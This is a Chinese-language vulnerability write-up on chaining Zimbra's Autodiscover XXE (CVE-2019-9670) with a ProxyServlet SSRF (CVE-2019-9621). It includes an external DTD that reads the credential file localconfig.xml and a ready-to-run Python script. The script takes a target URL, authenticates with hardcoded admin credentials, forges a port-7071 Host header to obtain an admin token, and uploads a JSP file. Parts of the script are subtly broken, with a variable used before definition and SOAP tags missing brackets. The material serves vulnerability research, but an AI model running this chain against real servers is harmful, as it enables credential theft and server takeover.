Zimbra邮件服务器利用XXE漏洞与SSRF完成对目标的文件上传与远程代码执行

前言

原文地址：https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html

参考文档：https://blog.csdn.net/fnmsd/article/details/88657083

历史版本存在的RCE（远程代码执行）漏洞：

CVE-2013-7091本地文件披露漏洞，影响范围为8.0.2以下版本。

CVE-2016-9924 XXE SoapEngine文件漏洞，影响范围为8.5以下版本，结合SSRF可造成RCE。

CVE-2019-9670 XXE Autodiscover文件漏洞，影响范围为8.5-8.7.11，结合SSRF可造成RCE。

至于在Zimbra 8.7.11-8.8.11版本上验证RCE，附加条件是Zimbra使用Memcached。

历史版本所有XXE漏洞：获取localconfig.xml

XML外部实体（XXE）攻击（有时称为XXE注入攻击）基于服务器端请求伪造。这种类型的攻击滥用了XML解析器广泛可用但很少使用的功能。使用XXE，攻击者能够导致拒绝服务（DoS）以及访问本地和远程内容和服务。在某些情况下，XXE甚至可以启用端口扫描并导致远程代码执行。有两种类型的XXE攻击：带内和带外。

Zimbra对其内部和外部操作使用大量的XML来处理，使用好XML文件会带来很大的XXE漏洞。

CVE-2016-9924的漏洞位于SoapEngine.chooseFaultProtocolFromBadXml（）中，该错误发生在invalid XML requests。此漏洞用于8.5以下的所有Zimbra实例版本。但由于无法将输出提取到HTTP response，因此在利用它时需要使用带外提取方法。

CVE-2018-20160漏洞是处理XMPP协议的XXE漏洞。

CVE-2019-9670在处理Autodiscover requests时达到了XXE漏洞的要求，这可以在8.5到8.7.11的Zimbra上应用。CVE-2019-9670的另一个缺陷是XHTML文档prevention bypass，这也导致了XXE，但是它们都是需要一些额外的条件来触发，这些都允许通过reponse直接提取文件。

一、CVE-2019-9670 XXE漏洞

1、根据文章提示找到漏洞触发的源码

根据文章提示，CVE-2019-9670在处理Autodiscover requsets时存在XXE漏洞，首先在内网的ubuntu 16.04LTS下安装zimbra 8.7.10版本，导出文件zimbra/lib/jar/zimbrastore.jar，利用java反编译器寻找关键字Autodiscover，发现此模块存在于com/zimbra/cs/service/AutoDiscoverServlet.class中。

向/Autodiscover/Autodiscover.xml 试着POST一个空的xml：

看到返回的是"No Email address is specified in the Request"，于是在AutoDiscoverServlet.class中查找此语句，发现发送的Request主要是由此模块下的一个doPost函数来处理，doPost函数大致如下：

分析doPost代码，其利用模块下的getTagValue函数解析request，发现一共只解析两个参数，第一个是EMailAddress，也就是邮件用户名，第二个是AcceptableResponseSchema，而这个AcceptableResponseSchema是造成XXE漏洞的关键参数。

继续分析：

 

第一个if语句是判断邮件用户是否为空，并没有用户验证机制，所以只需随便构造一个邮箱用户就可以了。

第二个if语句的responseSchema为上文中获取的AcceptableResponseSchema标签下的参数，如果此参数不为两个给定的类型，则报错并返回responseSchema的内容，此处造成了回显式的XXE。

2、根据漏洞构造xml

由上文分析得出request只需要两个参数即可，所以利用此条件构造内部注入的xml：

在docs.microsoft.com查询AutoDiscover的构造语句：

根据上图构造post语句，用RestClient插件发送post语句，如下图，XXE内部注入漏洞触发成功，返回文件内容：

由于localconfig.xml为XML文件，需要加上CDATA标签才能作为文本读取，由于XXE不能内部实体进行拼接，所以此处需要用外部dtd注入来触发XXE漏洞：

dtd文件：

<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">

<!ENTITY % start "<![CDATA[">

<!ENTITY % end "]]>">

<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">

构造外网可访问的站点，上传dtd文件，构造外部注入的数据包，post发送返回localconfig.xml的内容：

在安装时，Zimbra为其内部SOAP通信设置了一个全局管理员，用户名为“zimbra”，并随机生成密码。这些信息均存储在名为localconfig.xml的本地文件中。分析了CVE-2013-7091漏洞，某些条件下可以使用此类凭证来获得RCE。但是zimbra通过令牌管理用户权限，并设置了一个应用程序模型，使得管理令牌只能被授予进入管理端口的请求，默认情况下端口是7071，但是很多网站都没有开7071。

3、适用版本

经测试，适用版本为8.5-8.7.11，在8.8版本中，zimbra对AutoDiscover模块做了XML外部实体注入防护：

二、CVE-2019-9621 SSRF漏洞

如果目标网站关闭了7071端口，那么还有其他的方法，那就是SSRF漏洞。文章中提到用ProxyServlet，利用反编译器找到此函数：

根据博客文章的说明，此ProxyServlet可以代理对另一个位置的请求，并且这个servlet可以在普通用户的webapp上使用，因此可以从公共访问。但是代码具有另外的保护，它会检查代理目标是否与一组预定义的白名单域匹配，也就是说请求来自管理员，所以第一步先要取到管理员作为普通用户的autotoken值。由于zimbra在管理员检查中存在缺陷，它检查的第一件事是请求是否来自端口7071，但是它使用的是ServletRequest.getServerPort()来获取传入的端口。利用管理员的检查缺陷，用cookie发送带有“foo:7071”主机头和低权限的autotoken值，我们可以将请求代理到任意目标。

1、获取低权限autotoken值

低权限token可以通过soap接口发送AuthRequest进行获取：

使用已经获得的zimbra_admin_name和zimbra_ldap_password进行登陆，获取一个低权限Token。

2、利用该token使用cookie发送“foo:7071”造成SSRF

编写python脚本

首先通过账号和加密口令先获取低权限口令，然后通过proxy接口，向https://target.com/service/proxy?target=https://127.0.0.1:7071/service/admin/soap发送cookie，访问admin的soap接口获取高权限Token，获取权限然后实现文件上传。

#coding=utf8

import requests

import sys

from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

base_url=sys.argv[1]

base_url=base_url.rstrip("/")

#upload file name and content

filename = "111.jsp"

fileContent = r'<%out.println("111");%>'

print(base_url)

#low_token Stage

import re

username = "zimbra"

password = "3Z0sGzkL"

print(username)

print(password)

auth_body="""<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">

soap:Header

<context xmlns="urn:zimbra">

<userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>

</context>

/soap:Header

soap:Body

<AuthRequest xmlns="{xmlns}">

<account by="adminName">{username}</account>

<password>{password}</password>

</AuthRequest>

/soap:Body

/soap:Envelope

"""

print("[*] Get Low Privilege Auth Token")

r=requests.post(base_url+"/service/soap",data=auth_body.format(xmlns="urn:zimbraAccount",username=username,password=password),verify=False)

pattern_auth_token=re.compile(r"<authToken>(.*?)</authToken>")

print(pattern_auth_token)

low_priv_token = pattern_auth_token.findall(r.text)[0]

#print(low_priv_token)

# SSRF+Get Admin_Token Stage

headers["Cookie"]="ZM_ADMIN_AUTH_TOKEN="+low_priv_token+";"

headers["Host"]="foo:7071"

print("[*] Get Admin Auth Token By SSRF")

data=auth_body.format(xmlns="urn:zimbraAdmin",username=username,password=password)

print(data)

r = requests.post(base_url+"/service/proxy?target=https://127.0.0.1:7071/service/admin/soap",data=data,headers=headers,verify=False)

admin_token =pattern_auth_token.findall(r.text)[0]

#print("ADMIN_TOKEN:"+admin_token)

f = {

'filename1':(None,"whocare",None),

'clientFile':(filename,fileContent,"text/plain"),

'requestId':(None,"12",None),

}

headers ={

"Cookie":"ZM_ADMIN_AUTH_TOKEN="+admin_token+";"

}

print("[*] Uploading file")

r = requests.post(base_url+"/service/extension/clientUploader/upload",files=f,headers=headers,verify=False)

print(r.text)

print("Please vist "+base_url+"/downloads/"+filename)

print("[*] Request Result:")

s = requests.session()

r = s.get(base_url+"/downloads/"+filename,verify=False,headers=headers)

print(r.text)

print("May need cookie:")

print(headers['Cookie'])

对目标进行SSRF漏洞测试：

发现jsp文件已经上传成功！